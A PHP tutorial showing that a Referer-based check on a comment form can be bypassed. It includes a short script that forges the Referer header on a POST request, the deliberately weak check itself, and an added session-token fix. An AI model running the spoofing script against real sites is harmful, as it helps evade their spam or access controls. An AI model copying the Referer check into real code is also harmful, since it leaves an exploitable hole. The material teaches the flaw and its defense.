The HTTP Referer header is nothing more than the address of the page that linked the browser to the page it is now requesting.
If you try to "protect" a file by checking that the Referer value (or any other browser-supplied variable) points to your own site, that check can be bypassed with the simple technique below. You cannot trust any browser-supplied variable.
Suppose you have a form that asks the user for a user name and a comment. The form sends the input to, let's say, formprocess.php, and in formprocess.php you check whether the Referer is your site to keep out spam comments:
<?php
// Weak check: it trusts a header that the client chooses.
// eregi() was removed in PHP 7; preg_match() with the /i flag keeps the
// same case-insensitive substring match the original used.
if ( preg_match( "/www\.mysite\.com/i", $_SERVER['HTTP_REFERER'] ?? '' ) )
{
// do something
}
else
{
echo "Nice try";
}
?>
The problem is that you are relying on a browser-supplied variable. An attacker can bypass the check simply by sending your site as the Referer.
Look at this script:
<?php
// the site we want to attack
$host = "www.mysite.com";
// the file we want to attack
$file = "formprocess.php";
// the POST body; Content-Length is computed from it below
$body = "username=mustap&comment=NOCOMMENT";
// construct a header for our request
$hdrs = array( 'http' => array(
'method' => "POST",
'header'=> "Accept-Language: en\r\n" .
"Host: $host\r\n" .
"Referer: http://$host\r\n" . // Setting the http-referer
"Content-Type: application/x-www-form-urlencoded\r\n" .
"Content-Length: " . strlen($body) . "\r\n",
// the body belongs in 'content'; appending it to the headers sends a malformed request
'content' => $body
)
);
// get the requested page from the server
// with our header as a request-header
$context = stream_context_create($hdrs);
$fp = fopen("http://" . $host . "/" . $file, 'r', false, $context);
if ($fp === false)
{
die("Could not open http://$host/$file");
}
fpassthru($fp);
fclose($fp);
?>
Create a formprocess.php file with the check above and request it with this script; you will see that the if statement in formprocess.php is useless.
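What actually closes the hole is a secret the browser cannot invent: a per-session token that the server issues together with the form and verifies on submit. The following is an added example, not code from the original article; it assumes PHP 7 or later (random_bytes, hash_equals) and a single script, form.php, that both serves and processes the form:

```php
<?php
// form.php (added example): serves the form on GET and validates the
// submission on POST. The decision rests on a server-side token, not on
// the Referer header, so the forged header from the script above changes nothing.
session_start();

function issue_token(): string
{
    // One random token per session, stored where the client cannot read or alter it
    if (empty($_SESSION['form_token'])) {
        $_SESSION['form_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['form_token'];
}

function token_is_valid($submitted, $expected): bool
{
    // hash_equals() compares in constant time; both values must be non-empty strings
    return is_string($submitted) && is_string($expected)
        && $expected !== '' && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!token_is_valid($_POST['form_token'] ?? null, $_SESSION['form_token'] ?? null)) {
        // The attacker's script has no session cookie and no token, so it ends here
        http_response_code(403);
        exit('Nice try');
    }
    // One-shot token: a captured value cannot be replayed
    unset($_SESSION['form_token']);
    $username = $_POST['username'] ?? '';
    $comment  = $_POST['comment']  ?? '';
    // do something with $username and $comment
    echo 'Comment accepted';
    exit;
}

// GET: render the form with the token embedded as a hidden field
$token = htmlspecialchars(issue_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="post" action="">'
   . '<input type="hidden" name="form_token" value="' . $token . '">'
   . 'Name: <input name="username"> Comment: <input name="comment"> '
   . '<input type="submit" value="Send"></form>';
```

This ties the submission to the session that loaded the form, which is what the Referer check was trying to prove; a bot that fetches the form first still receives a token, so spam control additionally needs rate limiting or a challenge.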